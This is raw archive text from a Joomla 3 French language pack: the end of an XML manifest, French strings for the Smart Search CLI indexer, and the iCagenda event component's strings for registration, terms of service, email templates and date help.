	<author>French translation team : joomla.fr</author>
	<authorEmail>traduction@joomla.fr</authorEmail>
	<authorUrl>http://www.joomla.fr</authorUrl>
	<copyright>Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.</copyright>
	<copyright>joomla.fr</copyright>
	<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
	<description>French site language for Joomla 3</description>
	<metadata>
		<name>French (France)</name>
		<nativeName>Français (France)</nativeName>
		<tag>fr-FR</tag>
		<rtl>0</rtl>
		<locale>fr_FR.utf8, fr_FR.UTF-8, fr_FR.UTF-8@euro, fr_FR, fre_FR, fr, france</locale>
		<firstDay>1</firstDay>
		<weekEnd>0,6</weekEnd>
		<calendar>gregorian</calendar>
	</metadata>
	<params />
</metafile>
PK!�ؙ4]]fr-FR/fr-FR.finder_cli.ininu&1i�; @date        2014-09-16
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


FINDER_CLI="INDEXEUR de recherche avancée"
FINDER_CLI_BATCH_COMPLETE="* %s lot traité en %s secondes."
FINDER_CLI_BATCH_CONTINUING=" * Continuation du processus de traitement..."
FINDER_CLI_BATCH_PAUSING=" * Pause de %s seconds dans le processus..."
FINDER_CLI_FILTER_RESTORE_WARNING="Attention: taxinomie %s/%s absente dans le filtre %s"
FINDER_CLI_INDEX_PURGE="Effacer l'index"
FINDER_CLI_INDEX_PURGE_FAILED="- l'effacement de l'index a échoué"
FINDER_CLI_INDEX_PURGE_SUCCESS="- index effacé."
FINDER_CLI_PEAK_MEMORY_USAGE="Utilisation maximale de la mémoire : %s bytes"
FINDER_CLI_PROCESS_COMPLETE="Temps de traitement total: %s secondes."
FINDER_CLI_RESTORE_FILTER_COMPLETED="- nombre de filtres restaurés&nbsp;: %s"
FINDER_CLI_RESTORE_FILTERS="Restauration des filtres  "
FINDER_CLI_SAVE_FILTER_COMPLETED="- nombre de filtres sauvegardés&nbsp;: %s"
FINDER_CLI_SAVE_FILTERS="Sauvegarde des filtres"
FINDER_CLI_SETTING_UP_PLUGINS="Paramétrage des plug-ins de recherche"
FINDER_CLI_SETUP_ITEMS="%s éléments paramétrés en %s secondes."
FINDER_CLI_SKIPPING_PAUSE_LOW_BATCH_PROCESSING_TIME=" * Passant la pause, car le traitement précédent a eu un temps de traitement très court (%ss < %ss)"
FINDER_CLI_STARTING_INDEXER="Indexer à partir de"

PK!�>��ɐɐfr-FR/fr-FR.com_icagenda.ininu&1i�; iCagenda
; Copyright (c) 2012-2019 Cyril Rezé (www.icagenda.com). All rights reserved.
; License GNU General Public License version 3 or later <http://www.gnu.org/licenses/gpl.html>
; Note : All ini files need to be saved as UTF-8 - No BOM
;
; SITE                 : com_icagenda.ini
; Translation Platform : https://www.transifex.com/joomlic/icagenda


; iC global strings
IC_ANONYMOUS="Anonyme"
IC_EVENT="Évènement"
IC_EVENTS="Évènements"
IC_SELECT="- Sélectionnez -"
IC_SELECT_AN_OPTION="Sélectionnez une option"
IC_CHECK="Vérifier"

; Page 404
COM_ICAGENDA_PAGE_NOT_FOUND="Page Non Trouvée"
COM_ICAGENDA_REQUESTED_PAGE_NOT_FOUND="La page recherchée ne peut être affichée"
COM_ICAGENDA_CONTACT_THE_WEBMASTER_OR_TRY_AGAIN="vous pouvez contacter le Webmaster de ce site ou réessayez"
COM_ICAGENDA_USE_YOUR_BROWSERS_BACK_BUTTON="Utilisez le bouton <b>Retour</b> de votre navigateur pour accéder à la page que vous avez précédemment visité"
COM_ICAGENDA_OR_JUST_PRESS_BUTTON="Ou vous pouvez simplement cliquer sur ce button:"
COM_ICAGENDA_ERROR_EVENT_NOT_FOUND=" Évènement non trouvé"
COM_ICAGENDA_ERROR_THEME_PACK_OUTDATED="Le thème pack sélectionné n'est pas à jour."
COM_ICAGENDA_ERROR_THEME_PACK_EDIT_OR_CHANGE="Veuillez mettre à jour le fichier %s, ou sélectionner un autre Thème Pack afin d'afficher la liste des évènements."

; Libraries Error Messages
ICAGENDA_CLASS_NOT_FOUND="Classe %s non trouvée."
ICAGENDA_CAN_NOT_LOAD="iCagenda ne peut pas être chargé pour les raisons suivantes:"
IC_LIBRARY_NOT_LOADED="La librarie iC Library n'est pas correctement installée ou n'est pas chargée."
ICAGENDA_A_FOLDER_IS_MISSING="Un dossier est manquant."
ICAGENDA_IS_NOT_CORRECTLY_INSTALLED="Il semble que l'extension n'est pas installée correctement."
ICAGENDA_INSTALL_AGAIN="Merci d'installer à nouveau le composant iCagenda."
IC_ALTERNATIVELY="Sinon"
IC_PLEASE="Veuillez"
IC_LIBRARY_CHECK_PLUGIN_AND_LIBRARY="vérifier si la librairie <strong>iC Library</strong> et le plug-in système <strong>iC Library</strong> sont installés et activés."
ICAGENDA_UTILITIES_FIX_MANUAL="extraire l'archive d'installation et copier le dossier %s dans le dossier %s."
ICAGENDA_INSTALLATION_IS_BROKEN="Votre installation d'iCagenda est corrompue, veuillez ré-installer le composant."

; Terms & Privacy
COM_ICAGENDA_TERMS_OF_SERVICE="Conditions d'utilisation"
COM_ICAGENDA_TERMS_OF_SERVICE_AGREE="J'accepte les conditions d'utilisation et je consens au traitement et au stockage des informations soumises. Je confirme que j'ai toutes les permissions pour le contenu soumis."
COM_ICAGENDA_TERMS_OF_SERVICE_NOT_CHECKED_SUBMIT_EVENT="Pour proposer un évènement que vous devez accepter nos conditions d'utilisation!"

COM_ICAGENDA_TOS="<li>%s se réserve le droit d'approuver, modifier, refuser ou de supprimer un évènement sur ce site pour quelque raison que ce soit.</li> <li>Il est interdit d'inclure des discriminations fondées sur le sexe, l'âge, la race, les convictions politiques ou religieuses, et de respecter la législation en vigueur dans votre pays. %s n'acceptera pas les évènements qui semblent être contraires à la loi.</li><li>Vous avez lu les conditions d'utilisation dans son intégralité et vous comprenez ce que vous avez lu.</li><li>Vous vous engagez à respecter les conditions d'utilisation établies pour ce site.</li>"

COM_ICAGENDA_TERMS_AND_CONDITIONS="Conditions Générales"
COM_ICAGENDA_TERMS_AND_CONDITIONS_NOT_CHECKED_REGISTRATION="Vous devez accepter nos Conditions Générales!"

; Terms & Privacy - Registration Form
COM_ICAGENDA_REGISTRATION_CONSENT_PERSONAL_DATA_LEGEND="Consentement données personnelles"
COM_ICAGENDA_REGISTRATION_CONSENT_NAME_LABEL="Visibilité de mon nom"
COM_ICAGENDA_REGISTRATION_CONSENT_NAME_DESC="Votre nom peut être public dans la liste des participants à cet évènement."
COM_ICAGENDA_REGISTRATION_CONSENT_NAME="Je suis d'accord que mon nom soit public."
COM_ICAGENDA_REGISTRATION_CONSENT_NAME_USERS_DESC="Votre nom peut être vu par les autres utilisateurs connectés, dans la liste des participants à cet évènement."
COM_ICAGENDA_REGISTRATION_CONSENT_NAME_USERS="Je suis d'accord que mon nom soit visible par les membres du site internet."
COM_ICAGENDA_REGISTRATION_CONSENT_GRAVATAR_LABEL="Gravatar"
COM_ICAGENDA_REGISTRATION_CONSENT_GRAVATAR="J'autorise ce site à se connecter à <a href='https://gravatar.com' target='_blank'>Gravatar.com</a> et à afficher mon image d'avatar."
COM_ICAGENDA_REGISTRATION_CONSENT_ORGANISER_LABEL="Consentement à l'organisateur"
COM_ICAGENDA_REGISTRATION_CONSENT_ORGANISER_DESC="Lorsque vous vous enregistrez à cet évènement, nous communiquons les informations saisies à l'organisateur pour qu'il puisse gérer l'évènement et utiliser votre adresse e-mail pour vous envoyer des mises à jour.<br />Si vous ne souhaitez pas que l'organisateur ait ces informations, veuillez ne par continuer le processus d'inscription."
COM_ICAGENDA_REGISTRATION_CONSENT_ORGANISER="J'accepte que ce site internet partage mes informations avec l'organisateur."
COM_ICAGENDA_REGISTRATION_CONSENT_TERMS_LABEL="Conditions générales"
COM_ICAGENDA_REGISTRATION_CONSENT_TERMS_OF_THIS_WEBSITE="%s de ce site internet"
COM_ICAGENDA_REGISTRATION_CONSENT_TERMS="J'accepte les %s et je consens au traitement et au stockage des informations soumises."

COM_ICAGENDA_REGISTRATION_TERMS="<p>Bienvenue sur [SITENAME].<br />En utilisant ou en accédant à chacune des parties de nos services, vous acceptez tous les termes et conditions de nos Conditions Générales et toutes les autres règles de fonctionnement, de politique et de procédure qui seront publiées de temps à autre sur le site [SITENAME]. Si vous n'acceptez pas un seul de ces termes, conditions, règles, politiques ou procédures, vous ne devez pas utiliser ou accéder à nos services. [SITENAME] se réserve le droit, à sa seule discrétion, de modifier ou de remplacer l'un des termes ou conditions des présentes conditions générales à tout moment.</p><ol><li><strong>VOS OBLIGATIONS</strong><br /><p>Pour être un utilisateur enregistré à nos services, vous acceptez de: (a) fournir des informations réelles, exactes et complètes, à propos de vous-même comme demandées par le formulaire d'inscription du site (les «Données d'Inscription»). Si vous fournissez des informations fausses, inexactes, périmées ou incomplètes, ou que [SITENAME] a des raisons de soupçonner que ces informations sont fausses, inexactes, périmées ou incomplètes, [SITENAME] a le droit de suspendre ou de résilier l'ensemble de vos inscriptions et refuser l'accès à nos services (à toute ou partie). [SITENAME] est sensible à la sécurité et la vie privée de tous ses utilisateurs, en particulier les enfants. Pour cette raison, vous devez avoir au moins 18 ans ou l'âge légal de la majorité en vigueur dans le pays où vous résidez, pour vous inscrire à un évènement. </p></li><li><strong>VIE PRIVÉE</strong><br /><p>Tous les renseignements donnés ou fournis par vous à nos services peuvent être accessibles au public. Vous devez prendre soin de protéger ces renseignements ou informations qui sont importantes pour votre vie privé. [SITENAME] n'est en aucun cas responsable de la protection de telles informations et n'est pas responsable de la protection des courriers électroniques ou autres informations transmises par Internet ou tout autre réseau que vous pouvez utiliser. Merci de prendre en considération que si vous décidez de divulguer des informations personnelles sur nos services, ces informations peuvent devenir publiques. [SITENAME] ne contrôle pas et ne sera pas responsable des actions commises par vous ou d'autres utilisateurs (qu'ils soient organisateurs, membres, visiteurs ou autres) de nos services.</p></li><li><strong>ACCEPTATION DES CONDITIONS</strong><br /><p>Vous avez lu la totalité des termes et conditions et vous comprenez ce que vous avez lu.<br />Vous vous engagez à respecter les conditions générales établies pour ce site</p></li></ol>"

; Icons
; Print
COM_ICAGENDA_PRINT_LABEL="Imprimer"

; Add 2 Cal
COM_ICAGENDA_ADD_TO_CALL_LABEL="Ajouter au calendrier"
COM_ICAGENDA_VCAL_ICAL_LABEL="iCal Calendar"
COM_ICAGENDA_GCALENDAR_LABEL="Google Calendar"
COM_ICAGENDA_OUTLOOK_LABEL="Outlook Calendar"
COM_ICAGENDA_LIVE_CALENDAR_LABEL="Windows Live Calendar"
COM_ICAGENDA_YAHOO_CALENDAR_LABEL="Yahoo Calendar"

; Manager
; Approval of Events
COM_ICAGENDA_APPROVE_AN_EVENT_LBL="Valider cet évènement"
COM_ICAGENDA_APPROVE_AN_EVENT_DESC="Pour valider cet évènement, cliquez sur l'icône. Vous allez être redirigé et connecté automatiquement à l'administration, et vous serez en mesure de valider et/ou éditer cet évènement."
COM_ICAGENDA_APPROVE_AN_EVENT_NOTICE="Pour valider un évènement, cliquer sur l'icône %s"
COM_ICAGENDA_APPROVED="Validé"
COM_ICAGENDA_UNAPPROVED="Non-validé"
COM_ICAGENDA_APPROVED_SUCCESS="Évènement %s validé avec succès"

; Search (in dev.)
;COM_ICAGENDA_SEARCH="Recherche"
;COM_ICAGENDA_SEARCH_BTN="Rechercher"
COM_ICAGENDA_SEARCH_RESULTS="Résultats de la recherche :"
COM_ICAGENDA_SEARCH_NO_RESULT="Aucun résultat trouvé..."

; Events list Header
; SEARCH
COM_ICAGENDA_HEADER_SEARCH_TITLE="Résultats de la recherche"
COM_ICAGENDA_HEADER_SEARCH_ONE_EVENT="Il y a %s évènement correspondant à votre recherche"
COM_ICAGENDA_HEADER_SEARCH_MANY_EVENTS="Il y a %s évènements correspondant à votre recherche"
COM_ICAGENDA_HEADER_SEARCH_NO_EVENT="Aucun évènement ne correspond à vos critères de recherche, veuillez essayer une nouvelle recherche."

; ALL
COM_ICAGENDA_HEADER_ALL_TITLE="Tous les évènements"
COM_ICAGENDA_HEADER_ALL_ONE_EVENT="Il y a %s évènement"
COM_ICAGENDA_HEADER_ALL_MANY_EVENTS="Il y a %s évènements"
COM_ICAGENDA_HEADER_ALL_NO_EVENT="Aucun évènement!"

; TODAY & UPCOMING
COM_ICAGENDA_HEADER_TODAY_AND_UPCOMING_TITLE="Évènements à venir"
COM_ICAGENDA_HEADER_TODAY_AND_UPCOMING_ONE_EVENT="Il y a %s évènement à venir"
COM_ICAGENDA_HEADER_TODAY_AND_UPCOMING_MANY_EVENTS="Il y a %s évènements à venir"
COM_ICAGENDA_HEADER_TODAY_AND_UPCOMING_NO_EVENT="Aucun évènement à venir!"

; PAST
COM_ICAGENDA_HEADER_PAST_TITLE="Évènements passés"
COM_ICAGENDA_HEADER_PAST_ONE_EVENT="Il y a %s évènement passé"
COM_ICAGENDA_HEADER_PAST_MANY_EVENTS="Il y a %s évènements passés"
COM_ICAGENDA_HEADER_PAST_NO_EVENT="Aucun évènement passé!"

; UPCOMING
COM_ICAGENDA_HEADER_UPCOMING_TITLE="Évènements à venir"
COM_ICAGENDA_HEADER_UPCOMING_ONE_EVENT="Il y a %s évènement à venir"
COM_ICAGENDA_HEADER_UPCOMING_MANY_EVENTS="Il y a %s évènements à venir"
COM_ICAGENDA_HEADER_UPCOMING_NO_EVENT="Aucun évènement à venir!"

; TODAY
COM_ICAGENDA_HEADER_TODAY_TITLE="Les évènements d'aujourd'hui"
COM_ICAGENDA_HEADER_TODAY_ONE_EVENT="Il y a %s évènement aujourd'hui"
COM_ICAGENDA_HEADER_TODAY_MANY_EVENTS="Il y a %s évènements aujourd'hui"
COM_ICAGENDA_HEADER_TODAY_NO_EVENT="Aucun évènement aujourd'hui!"

COM_ICAGENDA_EVENTS_PAGE="Page"
COM_ICAGENDA_EVENTS_PAGE_PER_TOTAL="Page %s/%s"


; Events list Header Filters
COM_ICAGENDA_FILTERS="Recherche"
COM_ICAGENDA_FILTERS_SEARCH_PLACEHOLDER="Rechercher..."
COM_ICAGENDA_FILTERS_PERIOD_FROM="Du"
COM_ICAGENDA_FILTERS_PERIOD_TO="Au"
COM_ICAGENDA_FILTERS_SELECT_CATEGORY="- Sélectionner une catégorie -"
COM_ICAGENDA_FILTERS_SELECT_MONTH="- Sélectionner un mois -"
COM_ICAGENDA_FILTERS_SELECT_YEAR="- Sélectionnez une année -"
COM_ICAGENDA_FILTERS_MORE_OPTIONS="Plus d'options"
COM_ICAGENDA_FILTERS_SUBMIT="Rechercher"
COM_ICAGENDA_FILTERS_RESET="Réinitialiser"


; Events List
COM_ICAGENDA_EVENTS_NOIMAGE="aucune image"
COM_ICAGENDA_EVENTS_MORE_INFO="+ d'infos"
ICAGENDA_THANK_YOU_NOT_TO_REMOVE="Propulsé par %s"

; Event Details
COM_ICAGENDA_BACK="Retour"
COM_ICAGENDA_REGISTRATION_REGISTER="S'inscrire"
COM_ICAGENDA_REGISTRATION_EVENT_FULL="Complet"
COM_ICAGENDA_REGISTRATION_DATE_SOLD_OUT="Complet pour cette date"
COM_ICAGENDA_REGISTRATION_REGISTER_ANOTHER_DATE="Sélectionner une autre date"
COM_ICAGENDA_REGISTRATION_EVENT_FINISHED="Évènement Terminé"
COM_ICAGENDA_REGISTRATION_DATE_NO_TICKETS_LEFT="Plus aucune place disponible pour cette date"
COM_ICAGENDA_REGISTRATION_CLOSED="Inscriptions closes"
COM_ICAGENDA_EVENT_CAT="Catégorie"
COM_ICAGENDA_EVENT_DATE="Date"
COM_ICAGENDA_EVENT_COMPLETED="Évènement Terminé"
COM_ICAGENDA_EVENT_PERIOD="Évènement"
COM_ICAGENDA_PERIOD_FROM="du"
COM_ICAGENDA_PERIOD_TO="au"
COM_ICAGENDA_EVENT_SINGLE_DATES="Dates Uniques"
COM_ICAGENDA_EVENT_DATE_PAST="Dernière date"
COM_ICAGENDA_EVENT_DATE_LAST="Date"
COM_ICAGENDA_EVENT_DATE_FUTUR="Date à venir"
COM_ICAGENDA_EVENT_DATE_TODAY="Aujourd'hui"
COM_ICAGENDA_EVENT_DATE_PERIOD_NOW="En ce moment"
COM_ICAGENDA_EVENT_TIME="Horaire"
COM_ICAGENDA_EVENT_PLACE="Lieu"
COM_ICAGENDA_EVENT_CITY="Ville"
COM_ICAGENDA_EVENT_COUNTRY="Pays"
COM_ICAGENDA_EVENT_INFOS="Informations"
COM_ICAGENDA_EVENT_PHONE="Téléphone"
COM_ICAGENDA_EVENT_MAIL="Email"
COM_ICAGENDA_EVENT_WEBSITE="Site internet"
COM_ICAGENDA_EVENT_FILE="Pièce-jointe"
COM_ICAGENDA_EVENT_DOWNLOAD="Télécharger"
COM_ICAGENDA_EVENT_ADDRESS="Adresse"
COM_ICAGENDA_EVENT_MAP="Carte"
COM_ICAGENDA_EVENT_DATES="Toutes les Dates"
COM_ICAGENDA_EVENT_LIST_OF_PARTICIPANTS="Liste des Participants"
COM_ICAGENDA_NO_REGISTRATION="Aucun participant"
COM_ICAGENDA_NO_INFOS="Aucune information disponible"

COM_ICAGENDA_EVENT_CANCELLED_TEXT="Annulé"


; Added 3.2.14 - Strings with PLACE to be removed later
COM_ICAGENDA_EVENT_NUMBER_OF_SEATS="Nombre de places"
COM_ICAGENDA_EVENT_NUMBER_OF_SEATS_DESC="Nombre total de places pour cet évènement."
COM_ICAGENDA_EVENT_NUMBER_OF_SEATS_AVAILABLE="Places disponibles"


; Forms - alert messages
COM_ICAGENDA_FORM_REQUIRED_INFO="Tous les champs avec un * sont obligatoires."
COM_ICAGENDA_FORM_NC="Merci de vérifier que le formulaire est complet et correctement rempli."
COM_ICAGENDA_FORM_VALIDATE_FIELD_INVALID="Champ non-valide:"
COM_ICAGENDA_FORM_VALIDATE_FIELD_REQUIRED="Champ requis:"
COM_ICAGENDA_FORM_VALIDATE_FIELD_REQUIRED_NAME="Champ requis: %s"
COM_ICAGENDA_FORM_VALIDATE_FIELD_EMAIL2_MESSAGE="Vos adresses email ne correspondent pas. Veuillez réessayer."

; Forms - common strings
IC_FORM_EMAIL_CONFIRM_LBL="Confirmation Email"
IC_FORM_EMAIL_CONFIRM_DESC="Confirmez votre adresse email."
IC_FORM_EMAIL_CONFIRM_HINT="Saisissez à nouveau votre email"
COM_ICAGENDA_CANCEL="Annuler"
COM_ICAGENDA_CAPTCHA_LABEL="Captcha"

; Buttons
COM_ICAGENDA_BUTTON_VIEW_LIST="Afficher la liste"


; Registration form
COM_ICAGENDA_REGISTRATION_TITLE="Inscription"
COM_ICAGENDA_REGISTRATION_YOUR_INFORMATION_LEGEND="Vos informations"
ICAGENDA_REGISTRATION_FORM_USERID="ID Utilisateur"
ICAGENDA_REGISTRATION_FORM_USERID_DESC="id de l'utilisateur si membre enregistré"
ICAGENDA_REGISTRATION_FORM_NAME="Nom"
ICAGENDA_REGISTRATION_FORM_NAME_DESC="Saisissez votre nom complet."
ICAGENDA_REGISTRATION_FORM_EMAIL="Email"
ICAGENDA_REGISTRATION_FORM_EMAIL_DESC="Saisissez votre adresse email."
ICAGENDA_REGISTRATION_FORM_PHONE="Téléphone"
ICAGENDA_REGISTRATION_FORM_PHONE_DESC="Numéro de téléphone, utilisé uniquement en cas de nécessité."
ICAGENDA_REGISTRATION_FORM_DATE="Date"
ICAGENDA_REGISTRATION_FORM_DATE_DESC="Sélectionnez la date à laquelle vous voulez vous enregistrer."
ICAGENDA_REGISTRATION_FORM_PERIOD="Évènement"
ICAGENDA_REGISTRATION_FORM_PERIOD_DESC="S'inscrire pour toute la période de l'évènement."
ICAGENDA_REGISTRATION_FORM_PEOPLE="Nb de places"
ICAGENDA_REGISTRATION_FORM_PEOPLE_DESC="Nombre de personnes participant, dont vous."
ICAGENDA_REGISTRATION_FORM_NOTES="Commentaires"
ICAGENDA_REGISTRATION_FORM_NOTES_DESC="Entrez votre commentaire ici."
ICAGENDA_REGISTRATION_FORM_SUBMIT="Envoyer"
COM_ICAGENDA_REGISTRATION_NUMBER_PLACES="Nombre de places"
COM_ICAGENDA_REGISTRATION_NUMBER_PLACES_DESC="Nombre de personnes présentes, y compris vous"
COM_ICAGENDA_REGISTRATION_PLACES_LEFT="Places disponibles"
COM_ICAGENDA_REGISTRATION_ALREADY_BOOKED="Places déjà réservées"
COM_ICAGENDA_REGISTRATION_TY="Merci"
COM_ICAGENDA_REGISTRATION_COMPLETE_SUCCESS="Inscription terminée."
COM_ICAGENDA_REGISTRATION_COMPLETE_CONFIRMED="Votre inscription à l'évènement <i>%s</i> est maintenant confirmée!"
COM_ICAGENDA_REGISTRATION_DATE="Date"
COM_ICAGENDA_REGISTRATION_DATES="Dates"
COM_ICAGENDA_REGISTRATION_SUMMARY_LEGEND="Récapitulatif %s"
COM_ICAGENDA_REGISTRATION_SUMMARY_REGISTRATION="inscription"

COM_ICAGENDA_REGISTRATION_REGISTER_BTN="S'inscrire"

;COM_ICAGENDA_REGISTRATION_CANCEL_LABEL="Annulation d'inscription"
COM_ICAGENDA_REGISTRATION_CANCEL_LEGEND="Annuler l'inscription?"
COM_ICAGENDA_REGISTRATION_CANCEL_SELECT_DATES="Sélectionnez la (les) date (s) à annuler."
COM_ICAGENDA_REGISTRATION_CANCEL_ALL_DATES="Toutes les dates"
COM_ICAGENDA_REGISTRATION_CANCEL_CONFIRM_WARNING="La confirmation annulera votre inscription pour %s aux dates sélectionnées!"
COM_ICAGENDA_REGISTRATION_CANCEL_CONFIRM_BUTTON="Oui, annuler l'inscription"
COM_ICAGENDA_REGISTRATION_CANCEL_DENY_BUTTON="Non, conserver l'inscription"
COM_ICAGENDA_REGISTRATION_CANCEL_OTHER_DATES_BUTTON="Annuler d'autres dates?"
COM_ICAGENDA_REGISTRATION_CANCEL_SUCCESS="Inscription annulée."
COM_ICAGENDA_REGISTRATION_CANCEL_CONFIRMED="Votre inscription à l'évènement <i>%s</i> est maintenant annulée."
COM_ICAGENDA_REGISTRATION_CANCEL_NONE="Aucune inscription à annuler."
COM_ICAGENDA_REGISTRATION_CANCEL_USERACTION_SUBJECT="Annulation d'inscription"
COM_ICAGENDA_REGISTRATION_CANCEL_USERACTION_BODY="L'utilisateur a annulé son inscription."

COM_ICAGENDA_REGISTRATION_N_TICKETS="%s places"
COM_ICAGENDA_REGISTRATION_N_TICKETS_1="%s place"

COM_ICAGENDA_REGISTERED_EVENT_PERIOD="Évènement: du %s %s au %s %s"
COM_ICAGENDA_REGISTERED_EVENT_DATE="Date de l'évènement: %s %s"
COM_ICAGENDA_REGISTRATION_EVENT_LINK="Voir l'évènement"
COM_ICAGENDA_REGISTRATION_EMAIL_ALERT="Vous êtes déjà inscrit à cet évènement avec l'adresse e-mail:"
COM_ICAGENDA_REGISTRATION_EMAIL_NOT_VALID="Votre adresse email ne semble pas valide, merci de vérifier votre saisie et de réessayer."
COM_ICAGENDA_REGISTRATION_NAME_NOT_VALID="Le nom %s contient des caractères non valides.<br /> Le champ Nom ne doit pas contenir les caractères suivants: / \\ < > "_QQ_" [ ] ( ) &#37; ; = + &"
COM_ICAGENDA_REGISTRATION_NAME_MINIMUM_CHARACTERS="Un nom doit contenir un minimum de 2 caractères."
COM_ICAGENDA_ALERT_NO_TICKET_AVAILABLE_EVENT="Aucune place disponible pour cet évènement"
COM_ICAGENDA_ALERT_NOT_ENOUGH_TICKETS_AVAILABLE="Il n'y a plus assez de places disponibles."
COM_ICAGENDA_ALERT_NOT_ENOUGH_TICKETS_AVAILABLE_NOW="À l'heure actuelle, il reste %s place(s) disponible(s) jusqu'à ce qu'une nouvelle inscription soit validée par vous ou une autre personne."
COM_ICAGENDA_ALERT_NOT_ENOUGH_TICKETS_AVAILABLE_CHANGE_NUMBER="Merci de bien vouloir modifier le nombre de places dans la mesure des places disponibles."
COM_ICAGENDA_ALERT_NO_TICKETS_AVAILABLE="Aucune place disponible."
;
; Registration Emails
COM_ICAGENDA_REGISTRATION_EMAIL_USER_PERIOD_DEFAULT_SUBJECT="Votre inscription à l'évènement '[TITLE]' sur [SITENAME]"
COM_ICAGENDA_REGISTRATION_EMAIL_USER_PERIOD_DEFAULT_BODY="Bonjour [NAME],\n\nVous vous êtes enregistré à l'évènement '[TITLE]'.\n\nSi vous voulez revoir les détails de l'événement, vous pouvez cliquer sur le lien ci-dessous ou, si il n'est pas cliquable, copier/coller celui-ci dans votre navigateur internet.\n[EVENTURL]\n\nCet email contient vos informations personnelles saisies lors de votre inscription à cet événement sur ​​le site [SITEURL].\n\nNom: [NAME]\nEmail: [EMAIL]\nTéléphone: [PHONE]\nNb de places: [PLACES]\nPériode: du [STARTDATETIME] au [ENDDATETIME]\n[CUSTOMFIELDS]\nCommentaires: [NOTES]\n\nVous pouvez demander des informations, modifier vos informations personnelles ou annuler votre inscription en envoyant un courriel à: [AUTHOREMAIL]\n\nCordialement,\n[SITENAME]"
COM_ICAGENDA_REGISTRATION_EMAIL_USER_DATE_DEFAULT_SUBJECT="Votre inscription à l'évènement '[TITLE]' sur [SITENAME]"
COM_ICAGENDA_REGISTRATION_EMAIL_USER_DATE_DEFAULT_BODY="Bonjour [NAME],\n\nVous vous êtes enregistré à l'évènement '[TITLE]'.\n\nSi vous voulez revoir les détails de l'événement, vous pouvez cliquer sur le lien ci-dessous ou, si il n'est pas cliquable, copier/coller celui-ci dans votre navigateur internet.\n[EVENTURL]\n\nCet email contient vos informations personnelles saisies lors de votre inscription à cet événement sur ​​le site [SITEURL].\n\nNom: [NAME]\nEmail: [EMAIL]\nTéléphone: [PHONE]\nNb de places: [PLACES]\nDate : [DATETIME]\n[CUSTOMFIELDS]\nCommentaires: [NOTES]\n\nVous pouvez demander des informations, modifier vos informations personnelles ou annuler votre inscription en envoyant un courriel à: [AUTHOREMAIL]\n\nCordialement,\n[SITENAME]"
COM_ICAGENDA_REGISTRATION_EMAIL_ADMIN_DEFAULT_SUBJECT="Nouvelle inscription à l'évènement '[TITLE]' sur le site [SITENAME]"
COM_ICAGENDA_REGISTRATION_EMAIL_ADMIN_PERIOD_DEFAULT_BODY="Vous avez une nouvelle inscription à l'évènement '[TITLE]'.\n\nURL: [EVENTURL]\n\nNom: [NAME]\nEmail: [EMAIL]\nTéléphone: [PHONE]\nNb de places: [PLACES]\nPériode: du [STARTDATETIME] au [ENDDATETIME]\n[CUSTOMFIELDS]\nCommentaires: [NOTES]\n"
COM_ICAGENDA_REGISTRATION_EMAIL_ADMIN_DATE_DEFAULT_BODY="Vous avez une nouvelle inscription à l'évènement '[TITLE]'.\n\nURL: [EVENTURL]\n\nNom: [NAME]\nEmail: [EMAIL]\nTéléphone: [PHONE]\nNb de places: [PLACES]\nDate : [DATETIME]\n[CUSTOMFIELDS]\nCommentaires: [NOTES]\n"
COM_ICAGENDA_NOT_SPECIFIED="Non renseigné"


; Submit an Event Form
COM_ICAGENDA_TITLE_EVENT="Évènement"
;
; User information
COM_ICAGENDA_LEGEND_USERINFOS="Vos informations"
COM_ICAGENDA_SUBMIT_FORM_USER_NAME="Nom"
COM_ICAGENDA_SUBMIT_FORM_USER_NAME_DESC="Nom complet ou nom d'utilisateur pour les membres enregistrés."
COM_ICAGENDA_SUBMIT_FORM_USER_EMAIL="Email"
COM_ICAGENDA_SUBMIT_FORM_USER_EMAIL_DESC="Une adresse électronique valide sur laquelle vous souhaitez recevoir la notification de validation."
;
; Panel Event
COM_ICAGENDA_LEGEND_NEW_EVENT="Nouvel Évènement"
COM_ICAGENDA_LEGEND_EDIT_EVENT="Édition de l'évènement"
COM_ICAGENDA_FORM_LBL_EVENT_TITLE="Titre"
COM_ICAGENDA_FORM_DESC_EVENT_TITLE="Choisir le titre de l'évènement"
COM_ICAGENDA_FORM_LBL_EVENT_USERNAME="Utilisateur"
COM_ICAGENDA_FORM_DESC_EVENT_USERNAME="Nom de l'utilisateur, créateur de l'évènement"
COM_ICAGENDA_FORM_LBL_EVENT_CATID="Catégorie"
COM_ICAGENDA_FORM_DESC_EVENT_CATID="Catégorie à laquelle cet évènement est assigné"
;
; Panel Attachments
COM_ICAGENDA_LEGEND_ALLEG="Pièces Jointes"
COM_ICAGENDA_FORM_LBL_EVENT_IMAGE="Image"
COM_ICAGENDA_FORM_DESC_EVENT_IMAGE="Ajouter une image à l'évènement"
COM_ICAGENDA_FORM_LBL_EVENT_FILE="Fichier"
COM_ICAGENDA_FORM_DESC_EVENT_FILE="Joindre un fichier à l'évènement"
;
COM_ICAGENDA_LEGEND_DATES="Dates"
;
; Panel Dates
COM_ICAGENDA_DATES_HELP="Notice sur les dates"
COM_ICAGENDA_DATES_HELP_INTRO="Vous pouvez choisir un évènement avec date de début et date de fin et / ou des dates uniques :"
COM_ICAGENDA_DATES_HELP_LINE1="Évènement avec une seule date, et une heure de début."
COM_ICAGENDA_DATES_HELP_EXAMPLE1="ex: un concert qui commence à 20:00 et se déroule uniquement le jour sélectionné."
COM_ICAGENDA_DATES_HELP_LINE2="Évènement avec plusieurs dates, consécutives ou non, avec une heure de début, qui peut être différente pour chaque date."
COM_ICAGENDA_DATES_HELP_EXAMPLE2="ex: un concert qui aurait lieu une semaine, le vendredi et le samedi, et la semaine d'après, le vendredi. Ce concert peut ainsi débuté à différentes heures, et on peut rajouter des nouvelles dates à tout moment."
COM_ICAGENDA_DATES_HELP_LINE3="Évènement sur une période (de ... à ...)."
COM_ICAGENDA_DATES_HELP_EXAMPLE3="ex: un festival de musique qui commence jeudi à 14h00 et se termine le dimanche à 23h00. Dans ce cas, vous entrez la date de début et la date de fin."
COM_ICAGENDA_DATES_HELP_LINE4="Évènement se déroulant sur une période et vous souhaitez ajouter des moment clés à des heures précises."
